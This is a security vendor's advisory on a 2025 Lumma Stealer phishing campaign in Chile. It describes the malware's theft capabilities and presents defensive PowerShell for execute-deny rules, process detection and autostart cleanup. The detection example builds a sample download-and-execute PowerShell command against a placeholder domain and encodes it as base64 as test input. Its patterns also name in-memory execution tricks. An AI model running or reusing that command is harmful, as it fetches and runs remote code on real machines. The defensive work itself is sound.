Lumma Stealer malware affecting companies in Chile

Lumma Stealer in Chile

How this malware operates, and how Invisia stops it at every phase of the attack


Case overview: a malware still active in 2025

Santiago, May 2025

In recent weeks, multiple companies and public organizations in Chile have reported a new wave of malicious emails impersonating the SII (Servicio de Impuestos Internos, Chile's Internal Revenue Service) and other well-known institutions. The messages are carefully crafted to get users to download ZIP or PDF files that deliver malware. The goal: to steal sensitive information without the victim realizing it.
One of the main payloads in this campaign is Lumma Stealer, an infostealer distributed through phishing and through compromised or malicious links. Its design is not new, but it has stayed relevant since 2022 by continuously evolving and improving its evasion techniques.

The malware doesn't just target home users: it has also been detected in corporate environments, including government networks and financial-sector companies.


What is Lumma Stealer?

And why is it so dangerous in 2025?

Lumma Stealer remains an active threat in Chile in 2025. It belongs to the infostealer family and is sold under a Malware-as-a-Service (MaaS) model: any cybercriminal can pay for access, customize the build, and distribute it through their own phishing or other attack campaigns.


Impact

Once executed on a victim's system, Lumma is capable of:

  • Stealing credentials saved in browsers such as Chrome, Edge, and Firefox
  • Reading clipboard contents
  • Harvesting authentication tokens and session cookies, which let an attacker take over email or corporate accounts without ever needing the password
  • Stealing cryptocurrency wallet data (browser-extension and desktop wallet files), which lets the operators drain the funds
  • Collecting browsing history, autofill data, and other stored information

Even worse: many of its delivery chains are largely fileless. A script, typically PowerShell, decodes the payload and runs it directly in memory, leaving little on disk for signature-based tools to scan. This is a large part of why it remains one of the most complex and active malware threats affecting Chilean organizations in 2025.

The consequences can be devastating: identity theft, financial fraud, hijacked business sessions, and exfiltration of confidential data.

How Invisia responds: neutralizing Lumma Stealer phase by phase

Unlike traditional antivirus tools, Invisia does not depend on file signatures. Its approach is behavioral and contextual: it looks at where a file came from, what launched it, and what it tries to do. That is what makes it an effective barrier against a threat like Lumma, whose binaries are repacked constantly.



Here’s how Invisia blocks each phase of the attack:

Execution phase: when a file lands in a user-writable location such as Downloads or AppData, Invisia flags the suspicious path and applies icacls rules that deny the Execute permission, so the payload does not run even if the user double-clicks it. The deny has to land on the extracted executable, not only on the ZIP container: an archive is opened, not executed.
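As an added illustration (this is not Invisia's own code, which the page does not publish), the following PowerShell shows what a manual icacls deny-execute rule of this kind looks like. The folder, the list of payload extensions, and the use of the Everyone SID are assumptions made for the example.

```powershell
# Added example: deny Execute for Everyone on payload file types found in the
# current user's Downloads folder. Paths and the extension list are assumptions
# for this illustration, not Invisia's configuration.
$target = Join-Path $env:USERPROFILE 'Downloads'
$payloadTypes = @('*.exe', '*.scr', '*.bat', '*.cmd', '*.js', '*.vbs', '*.ps1')

# S-1-1-0 is the well-known SID for Everyone. Using the SID instead of the name
# avoids locale problems ("Everyone" is "Todos" on a Spanish Windows install).
# (X) is the execute right; a Deny ACE always wins over an Allow ACE.
Get-ChildItem -Path $target -Include $payloadTypes -File -Recurse |
    ForEach-Object {
        icacls $_.FullName /deny '*S-1-1-0:(X)' | Out-Null
        Write-Host "Execute denied: $($_.FullName)"
    }

# Verify: each file's DACL should now carry a Deny entry that includes ExecuteFile.
Get-ChildItem -Path $target -Include $payloadTypes -File -Recurse |
    ForEach-Object {
        $acl = Get-Acl -LiteralPath $_.FullName
        $denied = $acl.Access | Where-Object {
            $_.AccessControlType -eq 'Deny' -and
            $_.FileSystemRights.ToString() -match 'ExecuteFile'
        }
        [pscustomobject]@{ File = $_.Name; ExecuteDenied = [bool]$denied }
    }
```

Two caveats worth keeping in mind. A per-file deny only covers files that already exist when the rule runs; an inheritable deny on the folder itself (the `(OI)(IO)` flags) covers files created afterwards, and a user who extracts the archive somewhere else sidesteps both. ACL-based blocking is a stopgap next to a proper application-control policy such as AppLocker or WDAC.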

In-memory execution phase: if the payload does manage to start, its process is analyzed in real time. Invisia looks for:

  • Obfuscated or encoded arguments (e.g. -enc / -EncodedCommand, base64 blobs, IEX)
  • Abnormal parent-child pairs (e.g. winword.exe spawning cmd.exe or powershell.exe)
  • Executables launched from user-writable paths such as Temp, Public, or AppData

Result: the process is terminated immediately, and a visual alert is raised for the system administrator.
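The three indicators above are easy to express as a scoring rule over process-creation events. The PowerShell below is an added example, not Invisia's detection logic: it defines the rule, runs it over three constructed sample events (one Word-launched encoded PowerShell, one payload in Temp, one benign control), and shows how the same rule would be fed from Sysmon Event ID 1 on a real host. The function and variable names, the patterns, and the sample events are all assumptions of this example.

```powershell
# Added example: score process-creation events for the indicators named above.
# Names, patterns and the sample events are constructed for this illustration.

# Command-line patterns (PowerShell -match is case-insensitive by default).
$argPatterns = [ordered]@{
    'encoded command (-e/-enc/-EncodedCommand)'     = '(^|\s)-e(nc(odedcommand)?)?\s'
    'in-memory execution (IEX / Invoke-Expression)' = '\biex\b|invoke-expression'
    'base64 decode (FromBase64String)'              = 'frombase64string'
    'hidden window / no profile'                    = '-nop\b|-w(indowstyle)?\s+hidden'
}
# Office and PDF readers spawning a shell is the "abnormal parent" case.
$officeParents = '^(winword|excel|powerpnt|outlook|acrord32)\.exe$'
$shellChildren = '^(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32)\.exe$'
# User-writable locations an installer never uses but a dropped payload does.
$suspiciousPaths = '\\(Temp|Users\\Public|AppData\\(Local|Roaming)|Downloads)\\'

function Get-ProcessRisk {
    param([string]$Image, [string]$CommandLine, [string]$ParentImage)
    $reasons = @()
    foreach ($label in $argPatterns.Keys) {
        if ($CommandLine -match $argPatterns[$label]) { $reasons += $label }
    }
    $parentName = [IO.Path]::GetFileName($ParentImage)
    $childName  = [IO.Path]::GetFileName($Image)
    if ($parentName -match $officeParents -and $childName -match $shellChildren) {
        $reasons += "abnormal parent: $parentName -> $childName"
    }
    if ($Image -match $suspiciousPaths) { $reasons += "executable in user-writable path: $Image" }
    # -EncodedCommand takes base64 of UTF-16LE text; decode it so the analyst
    # sees the real script, then check the decoded text for download/execute primitives.
    if ($CommandLine -match '-e(nc(odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})') {
        try {
            $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[3]))
            $reasons += "decoded: $decoded"
            if ($decoded -match 'iex|invoke-expression|downloadstring|frombase64string') {
                $reasons += 'decoded payload contains a download/execute primitive'
            }
        } catch { $reasons += 'encoded argument present but not valid base64' }
    }
    [pscustomobject]@{ Image = $childName; Score = $reasons.Count; Reasons = $reasons }
}

# Constructed samples. The encoded command is built here so the example stays
# self-contained; example.invalid is a reserved, non-resolving domain.
$payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$samples = @(
    @{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = "powershell.exe -nop -w hidden -enc $encoded"
       ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE' },
    @{ Image = 'C:\Users\ana\AppData\Local\Temp\factura_sii.exe'
       CommandLine = 'factura_sii.exe'
       ParentImage = 'C:\Windows\explorer.exe' },
    @{ Image = 'C:\Windows\System32\notepad.exe'    # benign control, should score 0
       CommandLine = 'notepad.exe informe.txt'
       ParentImage = 'C:\Windows\explorer.exe' }
)
$samples | ForEach-Object { $ev = $_; Get-ProcessRisk @ev } | Where-Object Score -gt 0 | Format-List

function Get-SysmonProcessRisk {
    # Same rule over live Sysmon Event ID 1 records (needs Sysmon and admin rights).
    # Fields are read by name from the event XML, so this does not depend on the
    # property order of a particular Sysmon schema version.
    Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' -FilterXPath '*[System[EventID=1]]' -MaxEvents 500 |
        ForEach-Object {
            $data = @{}
            ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $data[$_.Name] = $_.'#text' }
            Get-ProcessRisk -Image $data.Image -CommandLine $data.CommandLine -ParentImage $data.ParentImage
        } | Where-Object Score -gt 0
}
```

The Word sample scores on four counts (encoded argument, hidden window, Office parent spawning PowerShell, and a decoded download-and-execute string), the Temp sample scores only on its path, and notepad scores zero. In production the path indicator alone is weak (many updaters run from AppData), so it should raise an alert only in combination with another indicator.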

Clipboard hijacking phase: Invisia monitors clipboard activity. If it detects content that looks like a token, password, or other credential being copied, it automatically replaces it with “BLOCKED BY INVISIA.”

Exfiltration phase: if the malware attempts to send data to destinations such as Discord, Telegram Web, or custom domains, Invisia blocks the traffic, closes the tabs involved, and alerts the system. Because Lumma's own command-and-control uses attacker-registered domains that change frequently, a destination list on its own is never enough; the behavioral checks from the earlier phases are what catch a new build.

Persistence phase: if the attacker tries to leave a payload in the registry or set it to run at startup, even from a recovery environment, Invisia's dashboard detects the change and reverses it remotely.
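The local equivalent of that check, as an added PowerShell example rather than Invisia's own remediation: audit the Run and RunOnce autostart keys for entries that point into user-writable paths or launch an encoded or script-host command, remove them, and quarantine the referenced binary instead of deleting it so the sample survives for analysis. The key list, the patterns, and the quarantine folder are assumptions of this example.

```powershell
# Added example: audit and clean suspicious autostart registry entries.
# Key list, patterns and quarantine location are assumptions for this illustration.
$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
# Flag: binaries in user-writable paths, encoded/in-memory PowerShell, or script hosts.
$suspicious = '(\\(Temp|Users\\Public|AppData\\(Local|Roaming)|Downloads)\\' +
              '|powershell(\.exe)?\s.*(-e(nc(odedcommand)?)?\s|iex|frombase64)' +
              '|\b(mshta|wscript|cscript|regsvr32|rundll32)(\.exe)?\s)'
# Metadata properties that Get-ItemProperty adds to every result; not registry values.
$psMeta = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

function Get-SuspiciousAutostart {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -in $psMeta) { continue }
            if ("$($p.Value)" -match $suspicious) {
                [pscustomobject]@{ Key = $key; Name = $p.Name; Command = "$($p.Value)" }
            }
        }
    }
}

$hits = @(Get-SuspiciousAutostart)
$hits | Format-Table -AutoSize

# Remediation: delete the autostart value, then move (not delete) the binary it
# points to. Writing under HKLM and ProgramData requires an elevated shell.
$quarantine = Join-Path $env:ProgramData 'Quarantine'
foreach ($h in $hits) {
    Remove-ItemProperty -Path $h.Key -Name $h.Name -ErrorAction SilentlyContinue
    # The first quoted token, or the first whitespace-delimited token, is the executable.
    if ($h.Command -match '^"([^"]+)"|^(\S+)') {
        $exe = if ($Matches[1]) { $Matches[1] } else { $Matches[2] }
        if (Test-Path -LiteralPath $exe) {
            New-Item -ItemType Directory -Path $quarantine -Force | Out-Null
            # Fails harmlessly if the binary is still running; kill the process first.
            Move-Item -LiteralPath $exe -Destination $quarantine -Force -ErrorAction SilentlyContinue
        }
    }
    Write-Host "Removed autostart '$($h.Name)' from $($h.Key)"
}
```

Run keys are only one of many autostart locations; scheduled tasks, the Startup folder, services, and WMI event subscriptions deserve the same review (Sysinternals Autoruns enumerates all of them). Removing the registry value while the payload is still running does nothing until the process is also terminated, which is why the in-memory phase above matters.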

In summary:
Lumma Stealer doesn't survive any phase of the attack cycle when faced with Invisia.

Tips to prevent these attacks (even if you’re not using Invisia)

Although Invisia can stop these attacks even if users make mistakes, it’s still essential to follow basic cybersecurity best practices:

  • Never download attachments from suspicious emails, especially archives (ZIP, RAR) and executable or script files (.exe, .scr, .js, .vbs)
  • Don't trust shortened links or messages from unknown senders
  • Always verify that the websites you visit are official by double-checking their domains
  • Keep your operating system and browsers updated
  • Use active and reputable security solutions
  • Train your team regularly to recognize phishing and social engineering attempts

SecureLabs: Creating solutions that not only detect threats, but reduce their existence from the source.

Want to learn how INVISIA can protect your company more intelligently?

Contact us here